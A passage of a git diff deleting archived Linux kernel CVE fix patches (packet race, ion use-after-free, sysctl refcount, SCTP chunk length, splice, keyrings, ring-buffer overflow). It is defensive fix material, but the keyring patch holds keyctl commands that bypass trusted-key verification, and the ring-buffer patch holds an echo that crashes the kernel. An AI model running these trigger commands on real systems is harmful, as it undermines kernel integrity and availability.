sg_miter_next+0x17/0xbd - [] ? mpi_read_raw_from_sgl+0xf2/0x146 - [] rsa_verify+0x9d/0xee - [] ? pkcs1pad_sg_set_buf+0x2e/0xbb - [] pkcs1pad_verify+0xc0/0xe1 - [] public_key_verify_signature+0x1b0/0x228 - [] x509_check_for_self_signed+0xa1/0xc4 - [] x509_cert_parse+0x167/0x1a1 - [] x509_key_preparse+0x21/0x1a1 - [] asymmetric_key_preparse+0x34/0x61 - [] key_create_or_update+0x145/0x399 - [] SyS_add_key+0x154/0x19e - [] do_syscall_64+0x80/0x191 - [] entry_SYSCALL64_slow_path+0x25/0x25 -Code: 56 41 55 41 54 53 48 81 ec a8 00 00 00 44 8b 71 04 8b 42 04 4c 8b 67 18 45 85 f6 89 45 80 0f 84 b4 06 00 00 85 c0 75 2f 41 ff ce <49> c7 04 24 01 00 00 00 b0 01 75 0b 48 8b 41 18 48 83 38 01 0f -RIP [] mpi_powm+0x32/0x7e6 - RSP -CR2: 0000000000000000 ----[ end trace d82015255d4a5d8d ]--- - -Basically, this is a backport of a libgcrypt patch: - - http://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=patch;h=6e1adb05d290aeeb1c230c763970695f4a538526 - -Fixes: cdec9cb5167a ("crypto: GnuPG based MPI lib - source files (part 1)") -Signed-off-by: Andrey Ryabinin -Signed-off-by: David Howells -cc: Dmitry Kasatkin -cc: linux-ima-devel@lists.sourceforge.net -cc: stable@vger.kernel.org -Signed-off-by: James Morris ---- - lib/mpi/mpi-pow.c | 7 ++++++- - 1 file changed, 6 insertions(+), 1 deletion(-) - -diff --git a/lib/mpi/mpi-pow.c b/lib/mpi/mpi-pow.c -index 5464c87..e24388a 100644 ---- a/lib/mpi/mpi-pow.c -+++ b/lib/mpi/mpi-pow.c -@@ -64,8 +64,13 @@ int mpi_powm(MPI res, MPI base, MPI exp, MPI mod) - if (!esize) { - /* Exponent is zero, result is 1 mod MOD, i.e., 1 or 0 - * depending on if MOD equals 1. */ -- rp[0] = 1; - res->nlimbs = (msize == 1 && mod->d[0] == 1) ? 0 : 1; -+ if (res->nlimbs) { -+ if (mpi_resize(res, 1) < 0) -+ goto enomem; -+ rp = res->d; -+ rp[0] = 1; -+ } - res->sign = 0; - goto leave; - } --- -cgit v1.1 - 
diff --git a/Patches/Linux_CVEs/CVE-2016-8655/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8655/ANY/0001.patch
deleted file mode 100644
index 0cded9fd..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8655/ANY/0001.patch
+++ /dev/null
@@ -1,92 +0,0 @@ -From 84ac7260236a49c79eede91617700174c2c19b0c Mon Sep 17 00:00:00 2001 -From: Philip Pettersson -Date: Wed, 30 Nov 2016 14:55:36 -0800 -Subject: packet: fix race condition in packet_set_ring - -When packet_set_ring creates a ring buffer it will initialize a -struct timer_list if the packet version is TPACKET_V3. This value -can then be raced by a different thread calling setsockopt to -set the version to TPACKET_V1 before packet_set_ring has finished. - -This leads to a use-after-free on a function pointer in the -struct timer_list when the socket is closed as the previously -initialized timer will not be deleted. - -The bug is fixed by taking lock_sock(sk) in packet_setsockopt when -changing the packet version while also taking the lock at the start -of packet_set_ring. - -Fixes: f6fb8f100b80 ("af-packet: TPACKET_V3 flexible buffer implementation.") -Signed-off-by: Philip Pettersson -Signed-off-by: Eric Dumazet -Signed-off-by: David S. Miller ---- - net/packet/af_packet.c | 18 ++++++++++++------ - 1 file changed, 12 insertions(+), 6 deletions(-) - -diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c -index d2238b2..dd23323 100644 ---- a/net/packet/af_packet.c -+++ b/net/packet/af_packet.c -@@ -3648,19 +3648,25 @@ packet_setsockopt(struct socket *sock, int level, int optname, char __user *optv - - if (optlen != sizeof(val)) - return -EINVAL; -- if (po->rx_ring.pg_vec || po->tx_ring.pg_vec) -- return -EBUSY; - if (copy_from_user(&val, optval, sizeof(val))) - return -EFAULT; - switch (val) { - case TPACKET_V1: - case TPACKET_V2: - case TPACKET_V3: -- po->tp_version = val; -- return 0; -+ break; - default: - return -EINVAL; - } -+ lock_sock(sk); -+ if (po->rx_ring.pg_vec || po->tx_ring.pg_vec) { -+ ret = -EBUSY; -+ } else { -+ po->tp_version = val; -+ ret = 0; -+ } -+ release_sock(sk); -+ return ret; - } - case PACKET_RESERVE: - { -@@ -4164,6 +4170,7 @@ static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u, - /* Added to 
avoid minimal code churn */ - struct tpacket_req *req = &req_u->req; - -+ lock_sock(sk); - /* Opening a Tx-ring is NOT supported in TPACKET_V3 */ - if (!closing && tx_ring && (po->tp_version > TPACKET_V2)) { - net_warn_ratelimited("Tx-ring is not supported.\n"); -@@ -4245,7 +4252,6 @@ static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u, - goto out; - } - -- lock_sock(sk); - - /* Detach socket from network */ - spin_lock(&po->bind_lock); -@@ -4294,11 +4300,11 @@ static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u, - if (!tx_ring) - prb_shutdown_retire_blk_timer(po, rb_queue); - } -- release_sock(sk); - - if (pg_vec) - free_pg_vec(pg_vec, order, req->tp_block_nr); - out: -+ release_sock(sk); - return err; - } - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-9120/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-9120/ANY/0001.patch deleted file mode 100644 index 7f79fcd2..00000000 --- a/Patches/Linux_CVEs/CVE-2016-9120/ANY/0001.patch +++ /dev/null 
@@ -1,178 +0,0 @@ -From 9590232bb4f4cc824f3425a6e1349afbe6d6d2b7 Mon Sep 17 00:00:00 2001 -From: EunTaik Lee -Date: Wed, 24 Feb 2016 04:38:06 +0000 -Subject: staging/android/ion : fix a race condition in the ion driver - -There is a use-after-free problem in the ion driver. -This is caused by a race condition in the ion_ioctl() -function. - -A handle has ref count of 1 and two tasks on different -cpus calls ION_IOC_FREE simultaneously. - -cpu 0 cpu 1 -------------------------------------------------------- -ion_handle_get_by_id() -(ref == 2) - ion_handle_get_by_id() - (ref == 3) - -ion_free() -(ref == 2) - -ion_handle_put() -(ref == 1) - - ion_free() - (ref == 0 so ion_handle_destroy() is - called - and the handle is freed.) - - ion_handle_put() is called and it - decreases the slub's next free pointer - -The problem is detected as an unaligned access in the -spin lock functions since it uses load exclusive - instruction. In some cases it corrupts the slub's -free pointer which causes a mis-aligned access to the -next free pointer.(kmalloc returns a pointer like -ffffc0745b4580aa). And it causes lots of other -hard-to-debug problems. - -This symptom is caused since the first member in the -ion_handle structure is the reference count and the -ion driver decrements the reference after it has been -freed. - -To fix this problem client->lock mutex is extended -to protect all the codes that uses the handle. 
- -Signed-off-by: Eun Taik Lee -Reviewed-by: Laura Abbott -Signed-off-by: Greg Kroah-Hartman ---- - drivers/staging/android/ion/ion.c | 55 ++++++++++++++++++++++++++++++--------- - 1 file changed, 42 insertions(+), 13 deletions(-) - mode change 100644 => 100755 drivers/staging/android/ion/ion.c - -diff --git a/drivers/staging/android/ion/ion.c b/drivers/staging/android/ion/ion.c -old mode 100644 -new mode 100755 -index 7ff2a7e..33b390e ---- a/drivers/staging/android/ion/ion.c -+++ b/drivers/staging/android/ion/ion.c -@@ -387,13 +387,22 @@ static void ion_handle_get(struct ion_handle *handle) - kref_get(&handle->ref); - } - --static int ion_handle_put(struct ion_handle *handle) -+static int ion_handle_put_nolock(struct ion_handle *handle) -+{ -+ int ret; -+ -+ ret = kref_put(&handle->ref, ion_handle_destroy); -+ -+ return ret; -+} -+ -+int ion_handle_put(struct ion_handle *handle) - { - struct ion_client *client = handle->client; - int ret; - - mutex_lock(&client->lock); -- ret = kref_put(&handle->ref, ion_handle_destroy); -+ ret = ion_handle_put_nolock(handle); - mutex_unlock(&client->lock); - - return ret; -@@ -417,20 +426,30 @@ static struct ion_handle *ion_handle_lookup(struct ion_client *client, - return ERR_PTR(-EINVAL); - } - --static struct ion_handle *ion_handle_get_by_id(struct ion_client *client, -+static struct ion_handle *ion_handle_get_by_id_nolock(struct ion_client *client, - int id) - { - struct ion_handle *handle; - -- mutex_lock(&client->lock); - handle = idr_find(&client->idr, id); - if (handle) - ion_handle_get(handle); -- mutex_unlock(&client->lock); - - return handle ? 
handle : ERR_PTR(-EINVAL); - } - -+struct ion_handle *ion_handle_get_by_id(struct ion_client *client, -+ int id) -+{ -+ struct ion_handle *handle; -+ -+ mutex_lock(&client->lock); -+ handle = ion_handle_get_by_id_nolock(client, id); -+ mutex_unlock(&client->lock); -+ -+ return handle; -+} -+ - static bool ion_handle_validate(struct ion_client *client, - struct ion_handle *handle) - { -@@ -532,22 +551,28 @@ struct ion_handle *ion_alloc(struct ion_client *client, size_t len, - } - EXPORT_SYMBOL(ion_alloc); - --void ion_free(struct ion_client *client, struct ion_handle *handle) -+static void ion_free_nolock(struct ion_client *client, struct ion_handle *handle) - { - bool valid_handle; - - BUG_ON(client != handle->client); - -- mutex_lock(&client->lock); - valid_handle = ion_handle_validate(client, handle); - - if (!valid_handle) { - WARN(1, "%s: invalid handle passed to free.\n", __func__); -- mutex_unlock(&client->lock); - return; - } -+ ion_handle_put_nolock(handle); -+} -+ -+void ion_free(struct ion_client *client, struct ion_handle *handle) -+{ -+ BUG_ON(client != handle->client); -+ -+ mutex_lock(&client->lock); -+ ion_free_nolock(client, handle); - mutex_unlock(&client->lock); -- ion_handle_put(handle); - } - EXPORT_SYMBOL(ion_free); - -@@ -1332,11 +1357,15 @@ static long ion_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - { - struct ion_handle *handle; - -- handle = ion_handle_get_by_id(client, data.handle.handle); -- if (IS_ERR(handle)) -+ mutex_lock(&client->lock); -+ handle = ion_handle_get_by_id_nolock(client, data.handle.handle); -+ if (IS_ERR(handle)) { -+ mutex_unlock(&client->lock); - return PTR_ERR(handle); -- ion_free(client, handle); -- ion_handle_put(handle); -+ } -+ ion_free_nolock(client, handle); -+ ion_handle_put_nolock(handle); -+ mutex_unlock(&client->lock); - break; - } - case ION_IOC_SHARE: --- -cgit v1.1 - 
diff --git a/Patches/Linux_CVEs/CVE-2016-9191/3.11-^4.8/0001.patch b/Patches/Linux_CVEs/CVE-2016-9191/3.11-^4.8/0001.patch
deleted file mode 100644
index cb95d37f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-9191/3.11-^4.8/0001.patch
+++ /dev/null
@@ -1,87 +0,0 @@ -From 93362fa47fe98b62e4a34ab408c4a418432e7939 Mon Sep 17 00:00:00 2001 -From: Zhou Chengming -Date: Fri, 6 Jan 2017 09:32:32 +0800 -Subject: sysctl: Drop reference added by grab_header in proc_sys_readdir - -Fixes CVE-2016-9191, proc_sys_readdir doesn't drop reference -added by grab_header when return from !dir_emit_dots path. -It can cause any path called unregister_sysctl_table will -wait forever. - -The calltrace of CVE-2016-9191: - -[ 5535.960522] Call Trace: -[ 5535.963265] [] schedule+0x3f/0xa0 -[ 5535.968817] [] schedule_timeout+0x3db/0x6f0 -[ 5535.975346] [] ? wait_for_completion+0x45/0x130 -[ 5535.982256] [] wait_for_completion+0xc3/0x130 -[ 5535.988972] [] ? wake_up_q+0x80/0x80 -[ 5535.994804] [] drop_sysctl_table+0xc4/0xe0 -[ 5536.001227] [] drop_sysctl_table+0x77/0xe0 -[ 5536.007648] [] unregister_sysctl_table+0x4d/0xa0 -[ 5536.014654] [] unregister_sysctl_table+0x7f/0xa0 -[ 5536.021657] [] unregister_sched_domain_sysctl+0x15/0x40 -[ 5536.029344] [] partition_sched_domains+0x44/0x450 -[ 5536.036447] [] ? __mutex_unlock_slowpath+0x111/0x1f0 -[ 5536.043844] [] rebuild_sched_domains_locked+0x64/0xb0 -[ 5536.051336] [] update_flag+0x11d/0x210 -[ 5536.057373] [] ? mutex_lock_nested+0x2df/0x450 -[ 5536.064186] [] ? cpuset_css_offline+0x1b/0x60 -[ 5536.070899] [] ? trace_hardirqs_on+0xd/0x10 -[ 5536.077420] [] ? mutex_lock_nested+0x2df/0x450 -[ 5536.084234] [] ? css_killed_work_fn+0x25/0x220 -[ 5536.091049] [] cpuset_css_offline+0x35/0x60 -[ 5536.097571] [] css_killed_work_fn+0x5c/0x220 -[ 5536.104207] [] process_one_work+0x1df/0x710 -[ 5536.110736] [] ? process_one_work+0x160/0x710 -[ 5536.117461] [] worker_thread+0x12b/0x4a0 -[ 5536.123697] [] ? process_one_work+0x710/0x710 -[ 5536.130426] [] kthread+0xfe/0x120 -[ 5536.135991] [] ret_from_fork+0x1f/0x40 -[ 5536.142041] [] ? kthread_create_on_node+0x230/0x230 - -One cgroup maintainer mentioned that "cgroup is trying to offline -a cpuset css, which takes place under cgroup_mutex. 
The offlining -ends up trying to drain active usages of a sysctl table which apprently -is not happening." -The real reason is that proc_sys_readdir doesn't drop reference added -by grab_header when return from !dir_emit_dots path. So this cpuset -offline path will wait here forever. - -See here for details: http://www.openwall.com/lists/oss-security/2016/11/04/13 - -Fixes: f0c3b5093add ("[readdir] convert procfs") -Cc: stable@vger.kernel.org -Reported-by: CAI Qian -Tested-by: Yang Shukui -Signed-off-by: Zhou Chengming -Acked-by: Al Viro -Signed-off-by: Eric W. Biederman ---- - fs/proc/proc_sysctl.c | 3 ++- - 1 file changed, 2 insertions(+), 1 deletion(-) - -diff --git a/fs/proc/proc_sysctl.c b/fs/proc/proc_sysctl.c -index 55313d9..d4e37ac 100644 ---- a/fs/proc/proc_sysctl.c -+++ b/fs/proc/proc_sysctl.c -@@ -709,7 +709,7 @@ static int proc_sys_readdir(struct file *file, struct dir_context *ctx) - ctl_dir = container_of(head, struct ctl_dir, header); - - if (!dir_emit_dots(file, ctx)) -- return 0; -+ goto out; - - pos = 2; - -@@ -719,6 +719,7 @@ static int proc_sys_readdir(struct file *file, struct dir_context *ctx) - break; - } - } -+out: - sysctl_head_finish(head); - return 0; - } --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-9555/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-9555/ANY/0001.patch deleted file mode 100644 index c96ff897..00000000 --- a/Patches/Linux_CVEs/CVE-2016-9555/ANY/0001.patch +++ /dev/null 
@@ -1,54 +0,0 @@ -From bf911e985d6bbaa328c20c3e05f4eb03de11fdd6 Mon Sep 17 00:00:00 2001 -From: Marcelo Ricardo Leitner -Date: Tue, 25 Oct 2016 14:27:39 -0200 -Subject: [PATCH] sctp: validate chunk len before actually using it - -Andrey Konovalov reported that KASAN detected that SCTP was using a slab -beyond the boundaries. It was caused because when handling out of the -blue packets in function sctp_sf_ootb() it was checking the chunk len -only after already processing the first chunk, validating only for the -2nd and subsequent ones. - -The fix is to just move the check upwards so it's also validated for the -1st chunk. - -Reported-by: Andrey Konovalov -Tested-by: Andrey Konovalov -Signed-off-by: Marcelo Ricardo Leitner -Reviewed-by: Xin Long -Acked-by: Neil Horman -Signed-off-by: David S. Miller ---- - net/sctp/sm_statefuns.c | 12 ++++++------ - 1 file changed, 6 insertions(+), 6 deletions(-) - -diff --git a/net/sctp/sm_statefuns.c b/net/sctp/sm_statefuns.c -index 026e3bca4a94b..8ec20a64a3f80 100644 ---- a/net/sctp/sm_statefuns.c -+++ b/net/sctp/sm_statefuns.c -@@ -3422,6 +3422,12 @@ sctp_disposition_t sctp_sf_ootb(struct net *net, - return sctp_sf_violation_chunklen(net, ep, asoc, type, arg, - commands); - -+ /* Report violation if chunk len overflows */ -+ ch_end = ((__u8 *)ch) + SCTP_PAD4(ntohs(ch->length)); -+ if (ch_end > skb_tail_pointer(skb)) -+ return sctp_sf_violation_chunklen(net, ep, asoc, type, arg, -+ commands); -+ - /* Now that we know we at least have a chunk header, - * do things that are type appropriate. - */ -@@ -3453,12 +3459,6 @@ sctp_disposition_t sctp_sf_ootb(struct net *net, - } - } - -- /* Report violation if chunk len overflows */ -- ch_end = ((__u8 *)ch) + SCTP_PAD4(ntohs(ch->length)); -- if (ch_end > skb_tail_pointer(skb)) -- return sctp_sf_violation_chunklen(net, ep, asoc, type, arg, -- commands); -- - ch = (sctp_chunkhdr_t *) ch_end; - } while (ch_end < skb_tail_pointer(skb)); - 
diff --git a/Patches/Linux_CVEs/CVE-2016-9576/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2016-9576/3.10/0002.patch
deleted file mode 100644
index d5e2e4dc..00000000
--- a/Patches/Linux_CVEs/CVE-2016-9576/3.10/0002.patch
+++ /dev/null
@@ -1,71 +0,0 @@ -From f569aee1087fa3da9712952fc00daa72b028424c Mon Sep 17 00:00:00 2001 -From: Linus Torvalds -Date: Sat, 07 Jan 2017 19:14:29 +0100 -Subject: [PATCH] splice: introduce FMODE_SPLICE_READ and FMODE_SPLICE_WRITE - -Introduce FMODE_SPLICE_READ and FMODE_SPLICE_WRITE. These modes check -whether it is legal to read or write a file using splice. Both get -automatically set on regular files and are not checked when a 'struct -fileoperations' includes the splice_{read,write} methods. - -Change-Id: Ice6a3fab20bf0ac131f8d908f4bb0f7dc34bf4e3 -Suggested-by: Linus Torvalds -Cc: Al Viro -Signed-off-by: Johannes Thumshirn ---- - -diff --git a/fs/open.c b/fs/open.c -index 9bf7fa0..e0e2a37 100644 ---- a/fs/open.c -+++ b/fs/open.c -@@ -680,6 +680,10 @@ - return 0; - } - -+ if (S_ISREG(inode->i_mode)) -+ f->f_mode |= FMODE_SPLICE_WRITE | FMODE_SPLICE_READ; -+ -+ - f->f_op = fops_get(inode->i_fop); - - error = security_file_open(f, cred); -diff --git a/fs/splice.c b/fs/splice.c -index f183f13..8ba78ce 100644 ---- a/fs/splice.c -+++ b/fs/splice.c -@@ -381,6 +381,9 @@ - index++; - } - -+ if (unlikely(!(in->f_mode & FMODE_SPLICE_READ))) -+ return -EINVAL; -+ - /* - * Now loop over the map and see if we need to start IO on any - * pages, fill in the partial map, etc. 
-@@ -1084,6 +1087,9 @@ - { - ssize_t ret; - -+ if (unlikely(!(out->f_mode & FMODE_SPLICE_WRITE))) -+ return -EINVAL; -+ - ret = splice_from_pipe(pipe, out, ppos, len, flags, write_pipe_buf); - if (ret > 0) - *ppos += ret; -diff --git a/include/linux/fs.h b/include/linux/fs.h -index e6f1180..78300ef 100644 ---- a/include/linux/fs.h -+++ b/include/linux/fs.h -@@ -125,6 +125,11 @@ - /* File was opened by fanotify and shouldn't generate fanotify events */ - #define FMODE_NONOTIFY ((__force fmode_t)0x1000000) - -+/* File can be read using splice */ -+#define FMODE_SPLICE_READ ((__force fmode_t)0x8000000) -+/* File can be written using splice */ -+#define FMODE_SPLICE_WRITE ((__force fmode_t)0x10000000) -+ - /* - * Flag for rw_copy_check_uvector and compat_rw_copy_check_uvector - * that indicates that they should check the contents of the iovec are diff --git a/Patches/Linux_CVEs/CVE-2016-9576/3.10/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2016-9576/3.10/0002.patch.base64 deleted file mode 100644 index 843461d6..00000000 --- a/Patches/Linux_CVEs/CVE-2016-9576/3.10/0002.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2016-9576/3.4/0001.patch b/Patches/Linux_CVEs/CVE-2016-9576/3.4/0001.patch deleted file mode 100644 index 869807a6..00000000 --- a/Patches/Linux_CVEs/CVE-2016-9576/3.4/0001.patch +++ /dev/null 
@@ -1,71 +0,0 @@ -From 741ab25b1f609f4ca11429b99811c4a427c60024 Mon Sep 17 00:00:00 2001 -From: Linus Torvalds -Date: Sat, 07 Jan 2017 19:14:29 +0100 -Subject: [PATCH] splice: introduce FMODE_SPLICE_READ and FMODE_SPLICE_WRITE - -Introduce FMODE_SPLICE_READ and FMODE_SPLICE_WRITE. These modes check -whether it is legal to read or write a file using splice. Both get -automatically set on regular files and are not checked when a 'struct -fileoperations' includes the splice_{read,write} methods. - -Change-Id: Ice6a3fab20bf0ac131f8d908f4bb0f7dc34bf4e3 -Suggested-by: Linus Torvalds -Cc: Al Viro -Signed-off-by: Johannes Thumshirn ---- - -diff --git a/fs/open.c b/fs/open.c -index 4c28c4f..7512d8a 100644 ---- a/fs/open.c -+++ b/fs/open.c -@@ -683,6 +683,10 @@ - return f; - } - -+ if (S_ISREG(inode->i_mode)) -+ f->f_mode |= FMODE_SPLICE_WRITE | FMODE_SPLICE_READ; -+ -+ - f->f_op = fops_get(inode->i_fop); - - error = security_dentry_open(f, cred); -diff --git a/fs/splice.c b/fs/splice.c -index ea85353..bf597dc5 100644 ---- a/fs/splice.c -+++ b/fs/splice.c -@@ -376,6 +376,9 @@ - index++; - } - -+ if (unlikely(!(in->f_mode & FMODE_SPLICE_READ))) -+ return -EINVAL; -+ - /* - * Now loop over the map and see if we need to start IO on any - * pages, fill in the partial map, etc. 
-@@ -1059,6 +1062,9 @@ - { - ssize_t ret; - -+ if (unlikely(!(out->f_mode & FMODE_SPLICE_WRITE))) -+ return -EINVAL; -+ - ret = splice_from_pipe(pipe, out, ppos, len, flags, write_pipe_buf); - if (ret > 0) - *ppos += ret; -diff --git a/include/linux/fs.h b/include/linux/fs.h -index 0e03633..ef0590d 100644 ---- a/include/linux/fs.h -+++ b/include/linux/fs.h -@@ -117,6 +117,11 @@ - /* File was opened by fanotify and shouldn't generate fanotify events */ - #define FMODE_NONOTIFY ((__force fmode_t)0x1000000) - -+/* File can be read using splice */ -+#define FMODE_SPLICE_READ ((__force fmode_t)0x8000000) -+/* File can be written using splice */ -+#define FMODE_SPLICE_WRITE ((__force fmode_t)0x10000000) -+ - /* - * The below are the various read and write types that we support. Some of - * them include behavioral modifiers that send information down to the diff --git a/Patches/Linux_CVEs/CVE-2016-9576/3.4/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-9576/3.4/0001.patch.base64 deleted file mode 100644 index 324e9bc2..00000000 --- a/Patches/Linux_CVEs/CVE-2016-9576/3.4/0001.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2016-9576/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2016-9576/ANY/0003.patch deleted file mode 100644 index a640c7fc..00000000 --- a/Patches/Linux_CVEs/CVE-2016-9576/ANY/0003.patch +++ /dev/null 
@@ -1,39 +0,0 @@ -From a0ac402cfcdc904f9772e1762b3fda112dcc56a0 Mon Sep 17 00:00:00 2001 -From: Linus Torvalds -Date: Tue, 6 Dec 2016 16:18:14 -0800 -Subject: [PATCH] Don't feed anything but regular iovec's to - blk_rq_map_user_iov - -In theory we could map other things, but there's a reason that function -is called "user_iov". Using anything else (like splice can do) just -confuses it. - -Reported-and-tested-by: Johannes Thumshirn -Cc: Al Viro -Signed-off-by: Linus Torvalds ---- - block/blk-map.c | 4 ++++ - 1 file changed, 4 insertions(+) - -diff --git a/block/blk-map.c b/block/blk-map.c -index b8657fa8dc9af..27fd8d92892d4 100644 ---- a/block/blk-map.c -+++ b/block/blk-map.c -@@ -118,6 +118,9 @@ int blk_rq_map_user_iov(struct request_queue *q, struct request *rq, - struct iov_iter i; - int ret; - -+ if (!iter_is_iovec(iter)) -+ goto fail; -+ - if (map_data) - copy = true; - else if (iov_iter_alignment(iter) & align) -@@ -140,6 +143,7 @@ int blk_rq_map_user_iov(struct request_queue *q, struct request *rq, - - unmap_rq: - __blk_rq_unmap_user(bio); -+fail: - rq->bio = NULL; - return -EINVAL; - } diff --git a/Patches/Linux_CVEs/CVE-2016-9604/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-9604/ANY/0001.patch deleted file mode 100644 index 3aeadfbb..00000000 --- a/Patches/Linux_CVEs/CVE-2016-9604/ANY/0001.patch +++ /dev/null 
@@ -1,82 +0,0 @@ -From 44c037827f0aeddbbbb323930fa3d09a7b4fffca Mon Sep 17 00:00:00 2001 -From: David Howells -Date: Tue, 18 Apr 2017 15:31:07 +0100 -Subject: KEYS: Disallow keyrings beginning with '.' to be joined as session - keyrings - -commit ee8f844e3c5a73b999edf733df1c529d6503ec2f upstream. - -This fixes CVE-2016-9604. - -Keyrings whose name begin with a '.' are special internal keyrings and so -userspace isn't allowed to create keyrings by this name to prevent -shadowing. However, the patch that added the guard didn't fix -KEYCTL_JOIN_SESSION_KEYRING. Not only can that create dot-named keyrings, -it can also subscribe to them as a session keyring if they grant SEARCH -permission to the user. - -This, for example, allows a root process to set .builtin_trusted_keys as -its session keyring, at which point it has full access because now the -possessor permissions are added. This permits root to add extra public -keys, thereby bypassing module verification. - -This also affects kexec and IMA. - -This can be tested by (as root): - - keyctl session .builtin_trusted_keys - keyctl add user a a @s - keyctl list @s - -which on my test box gives me: - - 2 keys in keyring: - 180010936: ---lswrv 0 0 asymmetric: Build time autogenerated kernel key: ae3d4a31b82daa8e1a75b49dc2bba949fd992a05 - 801382539: --alswrv 0 0 user: a - - -Fix this by rejecting names beginning with a '.' in the keyctl. - -Signed-off-by: David Howells -Acked-by: Mimi Zohar -cc: linux-ima-devel@lists.sourceforge.net -Signed-off-by: Greg Kroah-Hartman ---- - security/keys/keyctl.c | 9 +++++++-- - 1 file changed, 7 insertions(+), 2 deletions(-) - -diff --git a/security/keys/keyctl.c b/security/keys/keyctl.c -index fee27fe..af86b35 100644 ---- a/security/keys/keyctl.c -+++ b/security/keys/keyctl.c -@@ -277,7 +277,8 @@ error: - * Create and join an anonymous session keyring or join a named session - * keyring, creating it if necessary. 
A named session keyring must have Search - * permission for it to be joined. Session keyrings without this permit will -- * be skipped over. -+ * be skipped over. It is not permitted for userspace to create or join -+ * keyrings whose name begin with a dot. - * - * If successful, the ID of the joined session keyring will be returned. - */ -@@ -294,12 +295,16 @@ long keyctl_join_session_keyring(const char __user *_name) - ret = PTR_ERR(name); - goto error; - } -+ -+ ret = -EPERM; -+ if (name[0] == '.') -+ goto error_name; - } - - /* join the session */ - ret = join_session_keyring(name); -+error_name: - kfree(name); -- - error: - return ret; - } --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-9754/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-9754/ANY/0001.patch deleted file mode 100644 index 50952d96..00000000 --- a/Patches/Linux_CVEs/CVE-2016-9754/ANY/0001.patch +++ /dev/null 
@@ -1,89 +0,0 @@ -From 59643d1535eb220668692a5359de22545af579f6 Mon Sep 17 00:00:00 2001 -From: "Steven Rostedt (Red Hat)" -Date: Fri, 13 May 2016 09:34:12 -0400 -Subject: ring-buffer: Prevent overflow of size in ring_buffer_resize() - -If the size passed to ring_buffer_resize() is greater than MAX_LONG - BUF_PAGE_SIZE -then the DIV_ROUND_UP() will return zero. - -Here's the details: - - # echo 18014398509481980 > /sys/kernel/debug/tracing/buffer_size_kb - -tracing_entries_write() processes this and converts kb to bytes. - - 18014398509481980 << 10 = 18446744073709547520 - -and this is passed to ring_buffer_resize() as unsigned long size. - - size = DIV_ROUND_UP(size, BUF_PAGE_SIZE); - -Where DIV_ROUND_UP(a, b) is (a + b - 1)/b - -BUF_PAGE_SIZE is 4080 and here - - 18446744073709547520 + 4080 - 1 = 18446744073709551599 - -where 18446744073709551599 is still smaller than 2^64 - - 2^64 - 18446744073709551599 = 17 - -But now 18446744073709551599 / 4080 = 4521260802379792 - -and size = size * 4080 = 18446744073709551360 - -This is checked to make sure its still greater than 2 * 4080, -which it is. - -Then we convert to the number of buffer pages needed. - - nr_page = DIV_ROUND_UP(size, BUF_PAGE_SIZE) - -but this time size is 18446744073709551360 and - - 2^64 - (18446744073709551360 + 4080 - 1) = -3823 - -Thus it overflows and the resulting number is less than 4080, which makes - - 3823 / 4080 = 0 - -an nr_pages is set to this. As we already checked against the minimum that -nr_pages may be, this causes the logic to fail as well, and we crash the -kernel. - -There's no reason to have the two DIV_ROUND_UP() (that's just result of -historical code changes), clean up the code and fix this bug. 
- -Cc: stable@vger.kernel.org # 3.5+ -Fixes: 83f40318dab00 ("ring-buffer: Make removal of ring buffer pages atomic") -Signed-off-by: Steven Rostedt ---- - kernel/trace/ring_buffer.c | 9 ++++----- - 1 file changed, 4 insertions(+), 5 deletions(-) - -diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c -index 99d64cd..9c14373 100644 ---- a/kernel/trace/ring_buffer.c -+++ b/kernel/trace/ring_buffer.c -@@ -1657,14 +1657,13 @@ int ring_buffer_resize(struct ring_buffer *buffer, unsigned long size, - !cpumask_test_cpu(cpu_id, buffer->cpumask)) - return size; - -- size = DIV_ROUND_UP(size, BUF_PAGE_SIZE); -- size *= BUF_PAGE_SIZE; -+ nr_pages = DIV_ROUND_UP(size, BUF_PAGE_SIZE); - - /* we need a minimum of two pages */ -- if (size < BUF_PAGE_SIZE * 2) -- size = BUF_PAGE_SIZE * 2; -+ if (nr_pages < 2) -+ nr_pages = 2; - -- nr_pages = DIV_ROUND_UP(size, BUF_PAGE_SIZE); -+ size = nr_pages * BUF_PAGE_SIZE; - - /* - * Don't succeed if resizing is disabled, as a reader might be --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-9793/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-9793/ANY/0001.patch deleted file mode 100644 index 2f44e337..00000000 --- a/Patches/Linux_CVEs/CVE-2016-9793/ANY/0001.patch +++ /dev/null 
